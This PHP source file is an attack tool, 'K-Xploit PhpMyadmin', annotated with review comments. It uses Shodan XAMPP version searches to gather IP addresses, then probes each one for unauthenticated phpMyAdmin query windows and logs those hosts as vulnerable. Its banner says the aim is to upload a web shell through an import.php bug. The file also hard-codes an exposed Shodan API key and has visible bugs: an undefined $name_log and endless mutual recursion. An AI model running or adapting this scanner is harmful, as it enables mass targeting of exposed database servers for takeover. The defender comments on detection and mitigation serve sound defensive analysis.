- <?php
// Runtime setup: error_reporting(0) switches off all PHP diagnostics for the rest
// of the run, and set_time_limit(0) removes the execution time limit.
- error_reporting(0);
- set_time_limit(0);
- date_default_timezone_set('asia/jakarta');
// Print the banner, then enter the scan routine.
- cover();
- cari_target();
// In the visible code cari_target() ends by calling loadings(), which calls
// cari_target() again, so control does not come back here through a normal return.
- echo "\r\n--------------------------------------\r\n";
/**
 * Discovery-and-fingerprint loop of the scanner.
 *
 * Flow, as visible in this function:
 *  1. Deletes target_shor7cut.txt, then sends every search term in $dork to the
 *     Shodan host-search API and appends each match's ip_str to that file,
 *     "|"-separated.
 *  2. Reads the first line of the file back, splits it on "|", and requests
 *     http://<ip>/phpmyadmin/querywindow.php on every address.
 *  3. Labels a host "vulnerable" when the response carries a hidden "token"
 *     input but no "pma_password" string, i.e. a phpMyAdmin page was served
 *     without a login form. Such hosts are written to K-EXPLOIT.HTML and
 *     logs_shor7cut.txt.
 *  4. Appends a summary to Laporan.txt and calls loadings(), which calls this
 *     function again.
 *
 * No upload or exploitation request is issued in this function; it only finds
 * and records hosts.
 *
 * Defender view: the probe is a plain-HTTP GET for /phpmyadmin/querywindow.php
 * addressed to a bare IP, which is straightforward to alert on in web-server
 * logs. A host is only listed when phpMyAdmin is reachable from the internet
 * and answers without a login form, so restricting phpMyAdmin to local or
 * admin networks and requiring phpMyAdmin authentication takes a host out of
 * scope for this check.
 */
- function cari_target() {
// Each cycle starts from an empty target list.
- unlink("target_shor7cut.txt");
- //$name_output = "K-exploit-".date("d-m-Y@his").$extension;
- $name_output = "K-EXPLOIT.HTML";
- // SETTING \\
// Counters: $no numbers the search terms, $nos numbers the probed hosts;
// $success / $fail / $auth count the three classification outcomes below.
- $no=1;
- $nos=1;
- $success=0;
- $fail=0;
- $auth=0;
- $dbaru=0;
// NOTE(review): a Shodan API key is hard-coded here and was published with the
// paste; it should be treated as exposed and revoked by its owner.
- $api = "z3cBefrV3bmRx2rNZ0E1opuZxXNPrbIR";
- $name_lapor = "Laporan.txt";
- if($api==""){
- echo "[!] Ops... Get Your api in account.shodan.io\r\n";
- quit();
- }
- $total_target=0;
- // END:SETTING \\
// Search terms: "xampp" alone and paired with specific Apache/PHP version
// strings, i.e. hosts whose indexed banner advertises an XAMPP stack.
- $dork = array (
- 'xampp',
- 'xampp Apache/2.2.3',
- 'xampp Apache/2.2.4',
- 'xampp Apache/2.2.6',
- 'xampp Apache/2.2.8',
- 'xampp Apache/2.2.9',
- 'xampp Apache/2.2.11',
- 'xampp Apache/2.2.12',
- 'xampp Apache/2.2.14',
- 'xampp Apache/2.2.17',
- 'xampp Apache/2.2.21',
- 'xampp Apache/2.4.2',
- 'xampp Apache/2.4.3',
- 'xampp Apache/2.4.10',
- 'xampp Apache/2.4.12',
- 'xampp PHP/5.2.1',
- 'xampp PHP/5.2.2',
- 'xampp PHP/5.2.3',
- 'xampp PHP/5.2.4',
- 'xampp PHP/5.2.5',
- 'xampp PHP/5.2.6',
- 'xampp PHP/5.2.8',
- 'xampp PHP/5.2.9',
- 'xampp PHP/5.3.0',
- 'xampp PHP/5.3.1',
- 'xampp PHP/5.3.5',
- 'xampp PHP/5.3.8',
- 'xampp PHP/5.4.4',
- 'xampp PHP/5.4.7',
- 'xampp PHP/5.4.31',
- 'xampp PHP/5.5.15',
- 'xampp PHP/5.5.19',
- 'xampp PHP/5.6.3',
- 'xampp PHP/5.5.24',
- 'xampp PHP/5.6.8',
- 'xampp PHP/4.4.5',
- 'xampp PHP/4.4.6',
- 'xampp PHP/4.4.7',
- 'xampp PHP/4.4.8',
- 'xampp PHP/4.4.9'
- );
- $total_dork = count($dork);
- foreach ($dork as $dorks) {
- $noms = "(".$no."/".$total_dork.")";
- echo "(+) Mencari Target : ".$noms."\r\n(+) scanned in ";
// One HTTPS request to the Shodan search API per term; the key travels in the
// query string.
- $get = file_get_contents("https://api.shodan.io/shodan/host/search?key={$api}&query={$dorks}");
- $json = json_decode($get,true);
// Every returned match contributes its ip_str to the shared target file.
- foreach ($json['matches'] as $key => $value) {
- $fp = fopen("target_shor7cut.txt", 'a+');
- fwrite($fp, $value['ip_str']."|");
- fclose($fp);
- } // End Foreach
// The total reported by the API is capped at 100 per term for the running counter.
- $target_live = $json['total'];
- if($target_live>100){
- $target_live=100;
- }
- $total_target=$target_live+$total_target;
- echo round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds | Found -> ".$target_live." \r\n\n";
- $no++;
- }
- echo "[+] Total Target : [".$total_target."]\r\n";
// Only the first line of the file is read; all addresses were appended without
// a newline, separated by "|".
- $buka_file = fopen("target_shor7cut.txt", "r");
- $baca_file = fgets($buka_file);
- $target = explode("|", $baca_file);
- echo "[+] Memulai Mencari vulnerable\r\n";
- loading();
- echo "\r\n";
- $start = date("d-m-Y h:i:sa");
- foreach ($target as $sites) {
- $infos = "Scan : $sites (".$nos."/".$total_target.") - ".$name_output;
- echo "-> Info : (".$nos."/".$total_target.") | [S:".$success."/F:".$fail."/A:".$auth."] (DB: ".$dbaru.")\r\n";
- echo "-> Target : ".$sites."\r\n";
- echo "-> PhpMyadmin : ";
// Probe: plain-HTTP GET of phpMyAdmin's query window on the bare address,
// following redirects, with a 30-second overall timeout. This request is the
// observable a defender can match in access logs.
- $url = "http://$sites/phpmyadmin/querywindow.php";
- $phpmyn = curl_init("$url");
- curl_setopt($phpmyn, CURLOPT_FAILONERROR, true);
- curl_setopt($phpmyn, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($phpmyn, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($phpmyn, CURLOPT_CONNECTTIMEOUT ,0);
- curl_setopt($phpmyn, CURLOPT_TIMEOUT, 30);
- $phpmynresult = curl_exec($phpmyn);
// Classification is purely string-based on the response body:
//   hidden "token" input + "pma_password" present -> login form shown (counted in $auth)
//   hidden "token" input, no "pma_password"       -> page served without login (counted in $success)
//   no hidden "token" input                       -> not treated as phpMyAdmin (counted in $fail)
- $re = "/<input type=\"hidden\" name=\"token\" value=\"(.*)\"/";
- if(preg_match($re, $phpmynresult, $matches)){
- if(preg_match_all("/pma_password/", $phpmynresult, $matx)){
- echo "Not vulnerable (Auth)\r\n";
- $auth++;
- }else {
- echo "vulnerable\r\n";
- $hasil_output='<a href="'.$url.'" target=_blank>http://'.$sites.'</a><br>';
- //-----------------------------------------------------------------\\
- //--- If the same target already exists, the data is not saved to the database
- //--- If you want to remove this feature, edit it yourself
- //--- Delete the script that I have marked // START // END
- //--- Replace it with the script below
- /*
- $fp = fopen($name_output, 'a+');
- fwrite($fp, $hasil_output);
- fclose($fp);
- */
- //-----------------------------------------------------------------\\
- //start
// The write is skipped when $sites already matches within the contents read
// from $name_log.
- $buka_file = file_get_contents($name_log);
- if(!eregi($sites, $buka_file)){
- //save result
- $fp = fopen($name_output, 'a+');
- fwrite($fp, $hasil_output);
- fclose($fp);
- //save log
- $fp = fopen("logs_shor7cut.txt", 'a+');
- fwrite($fp, $sites."\r\n");
- fclose($fp);
- echo "-> Save-DB : Telah Ditambahkan\r\n";
- }else {
- echo "-> Save-DB : Tidak Ditambahkan\r\n";
- }
- //end
- $success++;
- }
- }else {
- echo "Not vulnerable\r\n";
- $fail++;
- }
- echo "-> Check Done in ".round((microtime(true)-$_SERVER['REQUEST_TIME_FLOAT']),2)." Seconds\r\n\n";
- $nos++;
- }
// Final report: counters, output file name and start/end timestamps are echoed
// and appended to the file named in $name_lapor.
- $lapor.= "\r\n\n---------------------------------------\r\n";
- $lapor.= " > LAPORAN AKHIR <\r\n";
- $lapor.= "\r\n---------------------------------------\r\n";
- $lapor.= "-> Total Target : ".$total_target."\r\n";
- $lapor.= "-> Total Success :".$success."\r\n";
- $lapor.= "-> Total fail :".$fail."\r\n";
- $lapor.= "-> Total Auth :".$auth."\r\n";
- $lapor.= "-> Total Target Baru :".$dbaru."\r\n";
- $lapor.= "-> Output File :".$name_output."\r\n";
- $lapor.= "-> Start Scan : ".$start."\r\n";
- $lapor.= "-> End Scan : ".date("d-m-Y h:i:sa");
- echo $lapor;
- $fp = fopen($name_lapor, 'a+');
- fwrite($fp, $lapor);
- fclose($fp);
// Hands over to loadings(), which calls cari_target() again.
- loadings();
- } // end of function
/**
 * Restart hook: passes control straight back to cari_target().
 *
 * cari_target() calls this as its last statement, so in the visible code the
 * two functions keep calling each other with no terminating condition.
 */
function loadings()
{
    cari_target();
}
/**
 * Console progress indicator shown before the probing phase.
 *
 * Prints a prompt, then three dot/space pairs with a one-second pause after
 * each character (about six seconds in total), and ends the line.
 */
function loading()
{
    echo "-> Pleas wait ";

    $remaining = 3;
    while ($remaining-- > 0) {
        echo ".";
        sleep(1);
        echo " ";
        sleep(1);
    }

    echo "\r\n";
}
/**
 * Prints the tool's ASCII banner and self-description to standard output.
 *
 * The banner text describes Shodan-based target discovery followed by a shell
 * upload through import.php; no upload code is visible in this listing.
 */
function cover()
{
    // Banner rows, each already terminated with "\r\n".
    $rows = array(
        " .---. \r\n",
        " |---| \r\n",
        " |---| \r\n",
        " |---| > K-Xploit PhpMyadmin (Multy Killer) < \r\n",
        " .---^ - ^---. \r\n",
        " :___________: Code By Shor7cut (Bug7sec Team) \r\n",
        " | |//| \r\n",
        " | |//| [DESCRIPTION] \r\n",
        " | |//| Looking for Target using shodan \r\n",
        " | |//| Then proceed to search \r\n",
        " | |.-| Phpmyadmin which has the bug import.php \r\n",
        " |.-'**| So that we can upload shell \r\n",
        " \***/ Through the bug import.php \r\n",
        " \*/ \r\n",
        " V Thank's : Tuban Cyber Team | IndoXploit | ISD-TEAM \r\n",
        " Yogyakarta Black Hat | Suram-Crew \r\n",
    );

    echo implode('', $rows);
}
?>